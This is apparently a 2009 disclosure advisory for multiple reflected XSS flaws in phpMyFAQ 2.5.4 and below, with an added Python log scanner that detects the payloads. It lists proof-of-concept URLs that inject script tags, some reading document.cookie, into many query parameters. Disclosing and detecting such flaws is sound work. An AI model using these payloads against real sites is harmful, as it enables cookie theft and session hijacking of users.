phpMyFAQ versions 2.5.4 and below suffer from cross-site scripting vulnerabilities.
################################################################################
Multiple XSS in phpMyFAQ <= 2.5.4
Name             : Multiple vulnerabilities in phpMyFAQ
Systems Affected : phpMyFAQ <= 2.5.4
Site             : http://www.phpmyfaq.de/
Author           : Amol Naik (amolnaik4[at]gmail.com)
Date             : 02/12/2009
################################################################################
############
OVERVIEW
############
phpMyFAQ 2.5 is a multilingual, completely database-driven FAQ-system.
######################
PoC
######################
http://localhost/phpmyfaq/index.php?action=sitemap&lang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?search=hello"><script>alert(document.cookie)</script>&action=search
http://localhost/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en
http://localhost/phpmyfaq/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1
http://localhost/phpmyfaq/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script>
http://localhost/phpmyfaq/index.php?action=search&tagging_id=1"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script>
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en
http://localhost/phpmyfaq/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en
http://localhost/phpmyfaq/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en
http://localhost/phpmyfaq/index.php?action=add&question=1&cat=1"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=add&question=1"><script>alert(1)</script>&cat=1
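
A log check for the parameters used in the PoC URLs above, as an added example that is not part of the original advisory or of phpMyFAQ. It assumes combined-format web server access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory's PoC URLs show carrying the injected markup.
REFLECTED_PARAMS = {
    "lang", "search", "highlight", "artlang", "letter", "cat",
    "tagging_id", "newslang", "id", "srclang", "question",
}
# Characters needed to close an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2009:10:00:01 +0000] "GET /phpmyfaq/index.php?action=sitemap&letter=W&lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Dec/2009:10:00:05 +0000] "GET /phpmyfaq/index.php?action=sitemap&lang=en%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5177',
    '198.51.100.7 - - [02/Dec/2009:10:00:09 +0000] "GET /phpmyfaq/index.php?action=send2friend&cat=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E&id=1&artlang=en HTTP/1.1" 200 4890',
    '192.0.2.10 - - [02/Dec/2009:10:00:12 +0000] "GET /phpmyfaq/index.php?search=hello&action=search HTTP/1.1" 200 6001',
]

def suspicious_params(target):
    """Return sorted reflected parameters whose decoded value contains markup."""
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed request target, nothing to parse
        return []
    if not parts.path.endswith("/index.php"):
        return []
    hits = set()
    # parse_qsl percent-decodes values, so %22%3E is checked as ">
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in REFLECTED_PARAMS and MARKUP.search(value):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Return (line_number, client, parameters) for each log line to review."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match is None:
            continue
        params = suspicious_params(match.group(1))
        if params:
            findings.append((number, line.split(" ", 1)[0], params))
    return findings
```

Ordinary searches that contain quote characters are reported for the search parameter as well, so findings need triage before they are treated as exploitation attempts.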
#############
Reference
#############
http://www.phpmyfaq.de/advisory_2009-12-01.php
#############
Workaround
#############
Upgrade to phpMyFAQ 2.5.5.
Download:
http://www.phpmyfaq.de/download.php
############
TimeLine
############
Bug discovered : 05/11/2009
Informed Vendor : 05/11/2009
Vendor releases new version : 02/12/2009
Public Disclosure : 02/12/2009